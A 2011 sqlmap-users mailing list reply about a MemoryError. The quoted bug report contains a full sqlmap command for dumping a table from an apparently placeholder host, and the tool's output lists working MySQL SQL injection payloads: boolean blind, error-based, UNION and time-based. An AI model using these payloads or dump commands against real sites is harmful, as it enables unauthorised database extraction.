Re: [sqlmap-users] Memory problems

[Miroslav S. <mir...@gm...>]

LOL (50,350 entries in the table and 48 columns)

we'll try to make some tests regarding this and report accordingly.
haven't planed this kind of "huge" data retrievals :)

kr

On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote:
> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6"
> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3
> -D nomes -T class --dump
>
>     sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>     http://sqlmap.sourceforge.net
>
> [*] starting at: 16:58:05
>
> [16:58:05] [DEBUG] cleaning up configuration parameters
> [16:58:05] [DEBUG] setting the HTTP timeout
> [16:58:05] [DEBUG] setting the HTTP Cookie header
> [16:58:05] [DEBUG] setting the HTTP method to POST
> [16:58:05] [DEBUG] creating HTTP requests opener object
> [16:58:05] [INFO] using
> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file
> [16:58:05] [INFO] resuming injection data from session file
> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
> [16:58:05] [INFO] testing connection to the target url
> you provided an HTTP Cookie header value. The target url provided its own
> Cookie within the HTTP Set-Cookie header. Do you want to continue using the
> HTTP Cookie values that you provided? [Y/n]
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: POST
> Parameter: vulnparam
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: vulnparam=6 AND 5647=5647
>
>     Type: error-based
>     Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>     Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT
> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1
> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM
> information_schema.tables GROUP BY x)a)
>
>     Type: UNION query
>     Title: MySQL UNION query (NULL) - 4 to 7 columns
>     Payload: vulnparam=6 UNION ALL SELECT NULL, NULL,
> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR),
> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL#
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: vulnparam=6 AND SLEEP(5)
> ---
>
> [16:58:06] [INFO] the back-end DBMS is MySQL
>
> web application technology: PHP 5.3.2
> back-end DBMS: MySQL 5.0
> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes'
> [16:58:06] [INFO] read from file
> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns
> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes'
> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL,
> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM
> nomes.class#
> [17:00:09] [DEBUG] performed 1 queries in 122 seconds
>
> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
> with the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to
> sql...@li... the command line, the following text and
> any information needed to reproduce the bug. The developers will try to
> reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9-dev
> Python version: 2.6.5
> Operating system: posix
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in
> start
>     action()
>   File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action
>     conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable())
>   File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in
> dumpTable
>     entries = inject.getValue(query, blind=False, dump=True)
>   File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue
>     value = __goInband(query, expected, sort, resumeValue, unpack, dump)
>   File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
>     data = parseUnionPage(output, expression, partial, None, sort)
>   File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in
> parseUnionPage
>     dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url,
> kb.injection.place, conf.parameters[kb.injection.place], expression,
> logOutput))
> MemoryError
>
> [*] shutting down at: 17:00:13
>
> There are about 50,350 entries in the table and 48 columns.I tested the
> query manually, and returned a page with 600k of information.I think that
> sqlmap did not support the amount of data...?
>
> David
>
> ------------------------------------------------------------------------------
> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)!
> Finally, a world-class log management solution at an even better price-free!
> Download using promo code Free_Logger_4_Dev2Dev. Offer expires
> February 28th, so secure your free ArcSight Logger TODAY!
> http://p.sf.net/sfu/arcsight-sfd2d
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia